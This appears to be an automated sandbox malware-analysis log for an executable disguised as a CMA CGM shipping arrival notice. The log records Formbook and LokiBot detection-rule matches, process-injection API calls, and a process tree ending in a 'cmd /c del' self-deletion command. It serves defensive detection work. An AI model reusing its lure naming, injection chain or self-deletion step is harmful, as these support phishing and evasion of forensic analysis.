      Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: String function: 1E60B150 appears 32 times
      Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0486B150 appears 32 times
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078F4F6 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078B52A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00793504 LoadLibraryA,NtSetContextThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007875D7 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A83B NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00792D4E NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078907D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A058 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A03A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A0D4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007890CD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789144 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A135 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A1B4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A27C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A250 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789214 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007892D0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007892B8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007892B4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789295 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078A364 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789339 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007893A8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789431 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007894B9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078B491 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789560 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789537 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078B5BC NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789668 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078B628 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007896E9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078B6A0 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078B71C NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078B789 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789783 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078185B NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789829 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007898A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078991F NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_0078990D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007889FB NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007899BC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_007889AC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00788A7C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789A21 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00788AE1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789AC7 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789A94 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789B7C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00788B54 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe | Code function: 0_2_00789B14 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789BF8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789C60 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788C45 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788CB8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789CA0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078BD69 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789D49 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788D40 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_0078DD10 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789DCC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788DAD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E69 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788E29 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789E00 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00785EAC NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788EA0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F7D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789F54 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00788F11 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FF4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 0_2_00789FAA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6496E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6497A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6498F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6499A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A10 NtQuerySection,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6496D0 NtCreateKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649760 NtOpenProcess,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64A770 NtOpenThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649FE0 NtCreateMutant,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6498A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649560 NtWriteFile,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E649520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E64AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6495F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6499D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeCode function: 12_2_1E6495D0 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048A9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_048AA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819D50 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819E80 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819E00 NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819F30 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819DFA NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819D4A NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00819F2A NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess Stats: CPU usage > 98%
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929592552.0000000002A30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamesmedesvende.exeFE2XKareo vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000000.661545013.0000000000448000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258380873.00000000000D9000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000000.927484403.0000000000448000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeBinary or memory string: OriginalFilenamesmedesvende.exe vs NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeVirustotal: Detection: 25%
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeReversingLabs: Detection: 18%
      Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknownProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exeProcess created: C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe'
